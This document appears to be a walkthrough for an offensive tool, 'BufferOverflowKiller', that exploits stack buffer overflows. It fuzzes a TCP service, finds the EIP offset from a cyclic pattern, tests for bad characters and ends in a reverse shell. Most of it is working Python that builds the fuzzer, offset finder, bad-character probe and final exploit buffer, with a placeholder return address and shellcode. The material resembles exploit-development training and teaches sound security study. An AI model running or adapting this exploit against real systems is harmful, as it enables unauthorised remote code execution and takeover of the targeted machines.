A tool for buffer overflow attacks
./BufferOverflowKiller.py
1. Change the destination IP address and port
2. Test the target program for a buffer overflow
3. Find the exact overflow boundary (the offset at which EIP is overwritten)
4. Exclude bad characters
5. Pwn the program and get a reverse shell connection back
Run module 2: fuzz the target program's input parameter to see whether it has a buffer overflow vulnerability.
The program is found to crash with an input of at most 2000 characters, so next the exact overflow boundary is tested (module 3).
Then open the crashed program in Immunity Debugger, read the value left in the EIP register and record it; here it is 6F43396E.
Then enter that EIP value into the tool.
The tool reports that the exact overflow boundary is 1978 characters: that is the position in the sent buffer of the bytes that ended up in EIP, so 1978 bytes of padding are needed before the return address.
Now run the fourth module, then go back to Immunity Debugger to check for bad characters.
There we can see which bytes the program mangles (the bad characters) and exclude them.
Run the fifth module and enter the local IP, port, the bad characters and the return address to overwrite EIP with.
Then open a second script and follow the supplementary instructions the tool prints.
Listen on the configured port, then run the tool to receive the shell.
With the connection back, Linux commands run normally.
When testing for bad characters, if the program has many of them, the test can simply be repeated, excluding the ones already found in each round, which is very convenient.
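The steps above (fuzzing, finding the offset from the recorded EIP value, building the bad-character probe for repeated rounds, and assembling the final buffer) are shown below as an added example. It is not BufferOverflowKiller's own code; the offset technique is a Metasploit-style cyclic pattern, which reproduces the 1978 figure from the walkthrough when given EIP 6F43396E, and the host, port, command prefix and return address 0x625011AF are placeholders to be replaced with values taken from Immunity Debugger.

```python
import socket
import string
import struct

# Added example (not the BufferOverflowKiller source): the building blocks behind
# modules 2-5 above. Target host/port, the command prefix and the return address
# are placeholders to be replaced with the values found in Immunity Debugger.


def pattern_create(length: int) -> bytes:
    """Metasploit-style cyclic pattern: Upper/lower/digit triples, unique up to
    20280 bytes, so any 4-byte window identifies its own position."""
    out = bytearray()
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                out += (u + l + d).encode()
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("pattern is only unique up to 20280 bytes")


def pattern_offset(eip_hex: str, length: int = 2000) -> int:
    """Offset at which the bytes now in EIP sat in the sent pattern.
    eip_hex is the register value as Immunity Debugger shows it (e.g. 6F43396E);
    x86 stores it little-endian, so the bytes in the buffer were 6E 39 43 6F."""
    needle = struct.pack("<I", int(eip_hex, 16))
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError("EIP value not in pattern: wrong value or pattern too short")
    return idx


def badchar_probe(exclude: bytes = b"\x00") -> bytes:
    """All byte values except the ones already known to be bad. Send it after
    the EIP overwrite, compare the memory dump in the debugger, add each mangled
    byte to `exclude` and send again until the dump is intact (the repeated
    test described on this page)."""
    return bytes(b for b in range(256) if b not in exclude)


def build_payload(offset: int, ret_addr: int, shellcode: bytes,
                  badchars: bytes, nop_sled: int = 16) -> bytes:
    """padding | return address (little-endian) | NOP sled | shellcode.
    ret_addr is the address module 5 asks for (typically a JMP ESP in a module
    that is not rebased). Refuses to emit a buffer whose address or shellcode
    contains a bad character, since the target would corrupt it."""
    ret = struct.pack("<I", ret_addr)
    for name, blob in (("return address", ret), ("shellcode", shellcode)):
        hit = sorted({b for b in blob if b in badchars})
        if hit:
            raise ValueError(f"{name} contains bad chars: "
                             + " ".join(f"\\x{b:02x}" for b in hit))
    return b"A" * offset + ret + b"\x90" * nop_sled + shellcode


def fuzz(host: str, port: int, prefix: bytes = b"", step: int = 100,
         limit: int = 2000, timeout: float = 3.0):
    """Module 2: send growing buffers until the service stops answering.
    Returns the first length that killed it, or None. Assumes a line-based TCP
    service whose vulnerable field follows `prefix` (e.g. b'USER ')."""
    for n in range(step, limit + 1, step):
        try:
            with socket.create_connection((host, port), timeout=timeout) as s:
                s.recv(1024)                    # banner, if the service sends one
                s.sendall(prefix + b"A" * n + b"\r\n")
                s.recv(1024)
        except (socket.timeout, ConnectionError, OSError):
            return n
    return None


if __name__ == "__main__":
    # Values from the walkthrough: EIP read as 6F43396E after a 2000-byte pattern.
    print("offset:", pattern_offset("6F43396E"))          # 1978
    print("probe bytes:", len(badchar_probe(b"\x00\x0a\x0d")))
    # 0x625011AF and the INT3 shellcode are placeholders, not real target values.
    demo = build_payload(1978, 0x625011AF, b"\xcc" * 4, b"\x00\x0a\x0d")
    print("payload length:", len(demo))
```

The fuzz function only reports the length at which the connection died; the crash itself is confirmed in the debugger, and the pattern of that same length is then sent in place of the "A"s so that EIP holds four recognisable bytes. The return address is packed little-endian and checked against the bad-character list just like the shellcode, because a single mangled byte in the address sends execution somewhere other than the NOP sled.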